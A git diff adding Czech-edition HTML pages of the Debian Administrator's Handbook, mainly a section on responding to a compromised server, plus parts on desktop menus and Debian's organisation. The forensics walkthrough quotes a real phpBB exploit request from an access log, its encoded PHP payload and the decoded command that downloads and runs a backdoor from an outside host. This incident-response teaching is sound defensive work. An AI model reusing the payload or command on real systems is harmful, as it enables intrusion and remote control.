+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.4"></a>13.2.3. Menu Management</h3></div></div></div><a
+            id="id-1.16.5.4.2"
+            class="indexterm"></a><a
+            id="id-1.16.5.4.3"
+            class="indexterm"></a><div
+            class="para">
+				Modern desktop environments and many window managers provide menus listing the available applications for the user. In order to keep menus up-to-date in relation to the actual set of available applications, each package usually provides a <code
+              class="filename">.desktop</code> file in <code
+              class="filename">/usr/share/applications</code>. The format of those files has been standardized by FreeDesktop.org: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://standards.freedesktop.org/desktop-entry-spec/latest/">https://standards.freedesktop.org/desktop-entry-spec/latest/</a></div>
+			</div><div
+            class="para">
+				The applications menus can be further customized by administrators through system-wide configuration files as described by the “Desktop Menu Specification”. End-users can also customize the menus with graphical tools such as <span
+              class="pkg pkg">kmenuedit</span> (in Plasma), <span
+              class="pkg pkg">alacarte</span> (in GNOME) or <span
+              class="pkg pkg">menulibre</span>. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://standards.freedesktop.org/menu-spec/latest/">https://standards.freedesktop.org/menu-spec/latest/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>HISTORY</em></span> The Debian menu system</strong></p></div></div></div><div
+              class="para">
+				Historically — way before the FreeDesktop.org standards emerged — Debian had invented its own menu system where each package provided a generic description of the desired menu entries in <code
+                class="filename">/usr/share/menu/</code>. This tool is still available in Debian (in the <span
+                class="pkg pkg">menu</span> package) but it is only marginally useful since package maintainers are encouraged to rely on <code
+                class="filename">.desktop</code> files instead.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="workstation.html"><strong>Předcházející</strong>Kapitola 13. Workstation</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.graphical-desktops.html"><strong>Další</strong>13.3. Graphical Desktops</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html b/tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html
new file mode 100644
index 000000000..bf71cc30e
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.dealing-with-compromised-machine.html
@@ -0,0 +1,309 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.7. Dealing with a Compromised Machine</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.other-security-considerations.html"
+        title="14.6. Other Security-Related Considerations" /><link
+        rel="next"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.dealing-with-compromised-machine.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-security-considerations.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="debian-packaging.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.dealing-with-compromised-machine"></a>14.7. Dealing with a Compromised Machine</h2></div></div></div><div
+          class="para">
+			Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.3"></a>14.7.1. Detecting and Seeing the Cracker's Intrusion</h3></div></div></div><div
+            class="para">
+				The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without an adequate monitoring infrastructure.
+			</div><div
+            class="para">
+				Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance one named <code
+              class="literal">apache</code> instead of the standard <code
+              class="literal">/usr/sbin/apache2</code>. If we follow that example, the thing to do is to note its process identifier, and check <code
+              class="filename">/proc/<em
+                class="replaceable">pid</em>/exe</code> to see what program this process is currently running:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>ls -al /proc/3719/exe</code></strong>
+<code
+              class="computeroutput">lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -&gt; /var/tmp/.bash_httpd/psybnc</code>
+</pre><div
+            class="para">
+				A program installed under <code
+              class="filename">/var/tmp/</code> and running as the web server? No doubt left, the machine is compromised.
+			</div><div
+            class="para">
+				This is only one example, but many other hints can ring the administrator's bell:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						an option to a command that no longer works; the version of the software that the command claims to be doesn't match the version that is supposed to be installed according to <code
+                    class="command">dpkg</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						errors caused by the <code
+                    class="filename">/tmp/</code> partition being full, which turned out to be full of illegal copies of movies;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						and so on.
+					</div></li></ul></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.4"></a>14.7.2. Putting the Server Off-Line</h3></div></div></div><div
+            class="para">
+				In any but the most exotic cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (access confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
+			</div><div
+            class="para">
+				This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it's usually a good idea to start by gathering some important information (see <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3 – „Keeping Everything that Could Be Used as Evidence“</a>, <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5 – „Forensic Analysis“</a> and <a
+              class="xref"
+              href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6 – „Reconstituting the Attack Scenario“</a>), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but <code
+              class="command">sshd</code>). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.keeping-everything-that-could-be-used-as-evidence"></a>14.7.3. Keeping Everything that Could Be Used as Evidence</h3></div></div></div><div
+            class="para">
+				Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
+			</div><div
+            class="para">
+				In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (<code
+              class="command">netstat -tupan</code> for network connections, <code
+              class="command">ps auxf</code> for a list of processes, <code
+              class="command">ls -alR /proc/[0-9]*</code> for a little more information on running programs), and every performed check should carefully be written down.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Hot analysis</strong></p></div></div></div><div
+              class="para">
+				While it may seem tempting to analyze the system as it runs, especially when the server is not physically reachable, this is best avoided: quite simply you can't trust the programs currently installed on the compromised system. It's quite possible for a subverted <code
+                class="command">ps</code> command to hide some processes, or for a subverted <code
+                class="command">ls</code> to hide files; sometimes even the kernel is compromised!
+			</div><div
+              class="para">
+				If such a hot analysis is still required, care should be taken to only use known-good programs. A good way to do that would be to have a rescue CD with pristine programs, or a read-only network share. However, even those countermeasures may not be enough if the kernel itself is compromised.
+			</div></div><div
+            class="para">
+				Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running <code
+              class="command">sync</code>) and reboot it on a rescue CD. Each partition should be copied with a tool such as <code
+              class="command">dd</code>; these images can be sent to another server (possibly with the very convenient <code
+              class="command">nc</code> tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.10.6"></a>14.7.4. Re-installing</h3></div></div></div><a
+            id="id-1.17.10.6.2"
+            class="indexterm"></a><div
+            class="para">
+				The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly <span
+              class="emphasis"><em>backdoors</em></span>). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
+			</div><div
+            class="para">
+				Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems. Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.forensic-analysis"></a>14.7.5. Forensic Analysis</h3></div></div></div><div
+            class="para">
+				Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the <code
+              class="literal">ro,nodev,noexec,noatime</code> options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
+			</div><div
+            class="para">
+				Retracing an attack scenario usually involves looking for everything that was modified and executed:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="filename">.bash_history</code> files often provide for a very interesting read;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						so does listing files that were recently created, modified or accessed;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the <code
+                    class="command">strings</code> command helps identifying programs installed by the attacker, by extracting text strings from a binary;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						the log files in <code
+                    class="filename">/var/log/</code> often allow reconstructing a chronology of events;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
+					</div></li></ul></div><div
+            class="para">
+				Some of these operations can be made easier with specialized software. In particular, the <span
+              class="pkg pkg">sleuthkit</span> package provides many tools to analyze a filesystem. Their use is made easier by the <span
+              class="emphasis"><em>Autopsy Forensic Browser</em></span> graphical interface (in the <span
+              class="pkg pkg">autopsy</span> package).
+			</div><a
+            id="id-1.17.10.7.6"
+            class="indexterm"></a><a
+            id="id-1.17.10.7.7"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.reconstituting-the-attack-scenario"></a>14.7.6. Reconstituting the Attack Scenario</h3></div></div></div><div
+            class="para">
+				All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
+			</div><div
+            class="para">
+				The following log is an extract from an Apache <code
+              class="filename">access.log</code>:
+			</div><pre
+            class="programlisting">
+www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&amp;highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
+</pre><div
+            class="para">
+				This example matches exploitation of an old security vulnerability in phpBB. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://secunia.com/advisories/13239/">http://secunia.com/advisories/13239/</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.phpbb.com/phpBB/viewtopic.php?t=240636">http://www.phpbb.com/phpBB/viewtopic.php?t=240636</a></div>
+			</div><div
+            class="para">
+				Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: <code
+              class="command">system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</code>. Indeed, a <code
+              class="filename">bd</code> file was found in <code
+              class="filename">/tmp/</code>. Running <code
+              class="command">strings /mnt/tmp/bd</code> returns, among other strings, <code
+              class="literal">PsychoPhobia Backdoor is starting...</code>. This really looks like a backdoor.
+			</div><div
+            class="para">
+				Some time later, this access was used to download, install and run an IRC <span
+              class="emphasis"><em>bot</em></span> that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
+			</div><pre
+            class="programlisting">** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
+** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
+** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
+** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
+** 2004-11-29-19:50:20: DCC CHAT Correct password
+(...)
+** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
+(...)
+** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
+(...)
+** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
+(...)
+** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
+</pre><div
+            class="para">
+				These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
+			</div><div
+            class="para">
+				In parallel, the attacker also downloaded a pair of extra files, <code
+              class="filename">/tmp/pt</code> and <code
+              class="filename">/tmp/loginx</code>. Running these files through <code
+              class="command">strings</code> leads to strings such as <span
+              class="foreignphrase"><em
+                class="foreignphrase">Shellcode placed at 0x%08lx</em></span> and <span
+              class="foreignphrase"><em
+                class="foreignphrase">Now wait for suid shell...</em></span>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
+			</div><div
+            class="para">
+				In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-security-considerations.html"><strong>Předcházející</strong>14.6. Other Security-Related Considerations</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="debian-packaging.html"><strong>Další</strong>Kapitola 15. Creating a Debian Package</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.debian-internals.html b/tmp/cs-CZ/html/sect.debian-internals.html
new file mode 100644
index 000000000..dc15c113b
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.debian-internals.html
@@ -0,0 +1,873 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.3. Vnitřní fungování projektu Debian</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.foundation-documents.html"
+        title="1.2. Dokumenty nadace" /><link
+        rel="next"
+        href="sect.follow-debian-news.html"
+        title="1.4. Follow Debian News" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.debian-internals.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.foundation-documents.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.follow-debian-news.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.debian-internals"></a>1.3. Vnitřní fungování projektu Debian</h2></div></div></div><a
+          id="id-1.4.6.2"
+          class="indexterm"></a><a
+          id="id-1.4.6.3"
+          class="indexterm"></a><div
+          class="para">
+			Bohaté konečné výsledky vyproduktované projektem Debian vycházejí současně z práce na infrastruktuře prováděné zkušenými vývojáři Debianu, z individuálních nebo kolektivních prací vývojářů na debianovských balíčcích a z reakcí uživatelů.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.6.5"></a>1.3.1. Vývojáři Debianu</h3></div></div></div><a
+            id="id-1.4.6.5.2"
+            class="indexterm"></a><div
+            class="para">
+				Debian developers have various responsibilities, and as official project members, they have great influence on the direction the project takes. A Debian developer is generally responsible for at least one package, but according to their available time and desire, they are free to become involved in numerous teams, acquiring, thus, more responsibilities within the project. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/devel/people">https://www.debian.org/devel/people</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/intro/organization">https://www.debian.org/intro/organization</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Teams">https://wiki.debian.org/Teams</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NÁSTROJ</em></span>Databáze vývojářů</strong></p></div></div></div><a
+              id="id-1.4.6.5.4.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.4.3"
+              class="indexterm"></a><div
+              class="para">
+				Debian has a database including all developers registered with the project, and their relevant information (address, telephone, geographical coordinates such as longitude and latitude, etc.). Some of the information (first and last name, country, username within the project, IRC username, GnuPG key, etc.) is public and available on the Web. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://db.debian.org/">https://db.debian.org/</a></div>
+			</div><div
+              class="para">
+				Zeměpisné souřadnice umožňují vytvoření mapy s umístěním všech vývojářů po celém světě. Debian je skutečně mezinárodní projekt: jeho vývojáře lze nalézt na všech kontinentech, i když většina je v “západních zemích”.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.4.6.5.4.6"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/developers-map.png"
+                    alt="Celosvětové rozmístění vývojářů Debianu" /></div><a
+                  id="id-1.4.6.5.4.6.3"
+                  class="indexterm"></a></div><p
+                class="title"><strong>Obrázek 1.1. Celosvětové rozmístění vývojářů Debianu</strong></p></div></div><div
+            class="para">
+				Package maintenance is a relatively regimented activity, very documented or even regulated. It must, in effect, comply with all the standards established by the <span
+              class="emphasis"><em>Debian Policy</em></span>. Fortunately, there are many tools that facilitate the maintainer's work. The developer can, thus, focus on the specifics of their package and on more complex tasks, such as squashing bugs. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.debian.org/doc/debian-policy/">https://www.debian.org/doc/debian-policy/</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span>Údržba balíčků, práce vývojáře</strong></p></div></div></div><a
+              id="id-1.4.6.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Údržba balíčku znamená nejprve “balení” programu. Konkrétně to znamená definovat prostředky instalace tak, aby po instalaci tento program fungoval a dodržoval pravidla, která projekt Debian pro sebe stanovil. Výsledek této operace je uložen v souboru <code
+                class="filename">.deb</code>. Účinná instalace programu pak nebude vyžadovat nic víc než extrakci tohoto komprimovaného archivu a spuštění některých předinstalačních nebo poinstalačních zde obsažených skriptů.
+			</div><div
+              class="para">
+				Po této počáteční fázi, cyklus údržby opravdu začíná: Příprava aktualizací podle nejnovějších Zásad Debianu, opravy chyb hlášených uživateli a zahrnutí nových “upstreamových” verzí programu, které se přirozeně i nadále současně vyvíjejí. Například v době počátečního balení byl program ve verzi 1.2.3. Po několika měsících vývoje, původní autoři vydávají novou stabilní verzi, očíslovanou 1.4.0. V tuto chvíli by měl správce Debianu balíček aktualizovat, aby uživatelé mohli využívat nejnovější stabilní verzi.
+			</div></div><a
+            id="id-1.4.6.5.7"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.8"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.9"
+            class="indexterm"></a><div
+            class="para">
+				The Policy, an essential element of the Debian Project, establishes the norms ensuring both the quality of the packages and perfect interoperability of the distribution. Thanks to this Policy, Debian remains consistent despite its gigantic size. This Policy is not fixed in stone, but continuously evolves thanks to proposals formulated on the <code
+              class="email"><a
+                class="email"
+                href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code> mailing list. Amendments that are agreed upon by all interested parties are accepted and applied to the text by a small group of maintainers who have no editorial responsibility (they only include the modifications agreed upon by the Debian developers that are members of the above-mentioned list). You can read current amendment proposals on the bug tracking system: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://bugs.debian.org/debian-policy">https://bugs.debian.org/debian-policy</a></div>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KOMUNITA</em></span> Proces vydávání Zásad</strong></p></div></div></div><div
+              class="para">
+				Kdokoli může navrhnout změnu v Zásadách Debianu pouhým odesláním chybového hlášení s úrovní závažnosti “přání” proti <span
+                class="pkg pkg">debian-policy</span> balíčku. Proces, který se spustí, je dokumentován v <code
+                class="filename">/usr/share/doc/debian-policy/Process.html </code>: Pokud je uznáno, že zjištěný problém musí být vyřešen vytvořením nového pravidla v Zásadách Debianu, začíná diskuze na seznamu elektronické pošty <code
+                class="email"><a
+                  class="email"
+                  href="mailto:debian-policy@lists.debian.org">debian-policy@lists.debian.org</a></code>, dokud není dosaženo shody a návrh je vydán. Někdo potom návrhne požadovanou změnu a předloží ke schválení (v podobě patche k přezkoumání). Jakmile dva další vývojáři schválí skutečnost, že navrhovaná změna odráží shodu dosaženou v předchozí diskusi (proces “secondování”), návrh může být zařazen do úředního dokumentu jedním ze správců balíčku <span
+                class="pkg pkg">debian-policy</span>. Pokud proces selže v jednom z těchto kroků, správci uzavřou chybu a klasifikují návrh jako zamítnutý.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ZÁSADY DEBIANU</em></span> dokumentace</strong></p></div></div></div><a
+              id="id-1.4.6.5.12.2"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.3"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.4"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.5"
+              class="indexterm"></a><a
+              id="id-1.4.6.5.12.6"
+              class="indexterm"></a><div
+              class="para">
+				Dokumentace pro každý balíček je uložena v <code
+                class="filename">/usr/share/doc/<em
+                  class="replaceable">balíček</em>/</code>. Tento adresář často obsahuje soubor <code
+                class="filename">README.Debian</code>, popisující specifické úpravy Debianu, které provádí správce balíčku. Je tedy moudré přečíst si tento soubor před jakýmkoliv nastavováním, a těžit z těchto zkušeností. Nalezneme také soubor <code
+                class="filename">changelog.Debian.gz</code> popisující změny provedené správcem Debianu při přechodu z jedné verze na následující. To by se nemělo zaměňovat se souborem <code
+                class="filename">changelog.gz</code> (nebo jeho obdobami), který popisuje změny provedené upstreamovými vývojáři. Soubor <code
+                class="filename">copyright</code> obsahuje informace o autorech a o licenci vztahující se na software. A na závěr také můžeme najít soubor s názvem <code
+                class="filename">NEWS.Debian.gz</code>, který vývojářům Debianu umožňuje sdělovat důležité informace týkající se aktualizací; Pokud je nainstalován <span
+                class="emphasis"><em>apt-listchanges</em></span>, zobrazí se tyto zprávy automaticky. Všechny ostatní soubory jsou specifické pro daný software. Především bychom chtěli poukázat na podadresář <code
+                class="filename">examples</code>, který často obsahuje příklady konfiguračních souborů.
+			</div></div><div
+            class="para">
+				Zásady do značné míry pokrývají technické aspekty balíčků. Velikost projektu také vyvolává organizační problémy; ty jsou řešeny Stanovami Debianu, které vytváří strukturu a prostředky pro rozhodování. Jinými slovy, formální systém řízení.
+			</div><a
+            id="id-1.4.6.5.14"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.15"
+            class="indexterm"></a><a
+            id="id-1.4.6.5.16"
